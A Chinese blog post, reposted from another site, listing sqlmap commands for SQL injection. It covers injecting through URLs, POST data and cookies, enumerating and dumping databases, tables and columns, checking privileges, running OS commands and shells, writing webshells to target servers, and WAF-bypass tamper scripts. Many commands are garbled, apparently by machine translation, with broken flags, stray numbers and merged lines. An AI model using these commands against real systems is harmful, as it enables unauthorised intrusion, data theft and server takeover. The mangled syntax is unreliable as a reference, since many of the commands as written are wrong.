环境: python
工具下载位置: sqlmap.org
SqlMap是我们常用的sql注入漏洞检测工具,为了方便大家平时使用,我在这里分享我总结的命令。
目录结构:
扩展:附加功能
lib:连接库、注入参数、权限操作
tamper :绕过脚本
thirdparty :第三方插件
txt :浏览器代理、表、列、关键字等词典
udf :自定义攻击载荷
waf :常见防火墙特征identify-waf
常用命令:
1 .注入检查方式:
get方式: sqlmap.py -u 'URL'post方式: sqlmap.py -u 'URL' -date 'post数据' cookie方式: sqlmap.py-u ' URL '-cookie '
获取数据库类型和版本:获取sqlmap.py-u ' URL '网站上使用的数据库名称和用户名。 sqlmap.py-u ' URL '-- current-db sqlmap.py-u ' URL '-- current-user 3
获取数据库的数据量: sqlmap.py -u 'URL' --count -D '数据库名称'判断用户权限: sqlmap.py-u ' URL '-- privileges4. myses
Mysql结构:库-表-列-数据-字段内容
注入顺序:
首先获取当前库名称。 sqlmap.py -u 'URL' --current-db然后获取库表名。 sqlmap.py -u 'URL' --tables -D '数据库名'然后获取库中某个表的列名。 sqlmap.py表名列名字段内容: sqlmap.py -u 'URL' --Dump -C '列名'-T '表名'-d '库名'5.管理数据库
连接数据库: sqlmap.py -d 'mysql://用户名:密码@地址:端口/数据库名称' (pymysql:3359 gir hub/pymysql/pymysql
注入页面无变化、无法通过布尔真伪判断、无法报告错误的情况。
sqlmap.py -u 'URL' --delay数字(以秒为单位) sqlmap.py -u 'URL' -safe-freq 7.运行和写入交互式命令Webshell
命令执行: sqlmap.py -u 'URL' --os-cmd='命令' webshell 3360 sqlmap.py-u ' URL '-- OS-shell8. tamper脚本
sqlmap.py -u 'URL' --tamper='向脚本名称' Webshell本地写入
sqlmap.py-u ' URL '--文件-写入'本地文件路径'--文件- dest '目标文件路径' 10 .批量检测注入漏洞
sqlmap.py -m本地文件路径和BurpSuite:sqlmap.py -l本地文件路径---batch-smart///batch3360自动选择是,smart :启发式
--proxy='http://ip:8080' //浏览器代理---level=(1-5)//测试级别---risk=(0-3)//风险级别未完成
本文转载自天乐博客: http://blog.tianles.com/67.html